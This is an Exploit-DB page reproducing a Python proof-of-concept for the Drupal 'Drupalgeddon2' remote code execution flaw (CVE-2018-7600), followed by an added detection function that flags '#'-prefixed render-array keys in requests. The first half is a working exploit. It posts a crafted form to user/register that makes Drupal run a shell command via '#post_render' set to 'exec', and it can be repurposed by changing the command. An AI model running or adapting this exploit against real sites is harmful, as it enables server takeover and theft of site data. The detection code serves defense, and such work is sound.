Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)

  • Author: Vitalii Rudnykh
    Date: 2018-04-13
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44448/
  • #!/usr/bin/env python3
    import sys
    import requests
    
    print ('################################################################')
    print ('# Proof-Of-Concept for CVE-2018-7600')
    print ('# by Vitalii Rudnykh')
    print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
    print ('# https://github.com/a2u/CVE-2018-7600')
    print ('################################################################')
    print ('Provided only for educational or information purposes\n')
    
    target = input('Enter target url (example: https://domain.ltd/): ')
    
    # Add proxy support (eg. BURP to analyze HTTP(s) traffic)
    # set verify = False if your proxy certificate is self signed
    # remember to set proxies both for http and https
    # 
    # example:
    # proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
    # verify = False
    proxies = {}
    verify = True
    
    url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
    payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}
    
    r = requests.post(url, proxies=proxies, data=payload, verify=verify)
    check = requests.get(target + 'hello.txt')
    if check.status_code != 200:
        sys.exit("Not exploitable")
    print ('\nCheck: '+target+'hello.txt')
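
For detection, the request built by the PoC above stands out because its parameter names and its `element_parents` path carry keys that begin with `#`. The following is an added example, not part of the original PoC or of Drupal; the function name `suspicious_render_keys` and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# A parameter-name segment starting with '#', e.g. mail[#post_render][]
_HASH_KEY = re.compile(r'(^|\[)#')

def suspicious_render_keys(url, body=''):
    """List the reasons a request looks like render-array property injection."""
    reasons = []
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    params += parse_qsl(body, keep_blank_values=True)  # form-encoded POST body
    for name, value in params:
        if _HASH_KEY.search(name):
            reasons.append('key:' + name)
        # element_parents is a '/'-separated path into the submitted form array
        if name == 'element_parents' and any(
                part.startswith('#') for part in value.split('/')):
            reasons.append('element_parents:' + value)
    return reasons

# Constructed sample requests (not captured traffic); command value replaced.
POC_URL = ('/user/register?element_parents=account/mail/%23value'
           '&ajax_form=1&_wrapper_format=drupal_ajax')
POC_BODY = ('form_id=user_register_form&_drupal_ajax=1'
            '&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup'
            '&mail%5B%23markup%5D=PLACEHOLDER')
BENIGN_URL = '/user/register?_wrapper_format=drupal_ajax'
BENIGN_BODY = 'form_id=user_register_form&name=alice&comment=issue+%2312'

if __name__ == '__main__':
    for url, body in ((POC_URL, POC_BODY), (BENIGN_URL, BENIGN_BODY)):
        print(url, '->', suspicious_render_keys(url, body) or 'clean')
```

Web server access logs normally record only the URL, so the `element_parents` check is the part that works on logs alone; the body check needs a WAF or reverse proxy that can see the POST data.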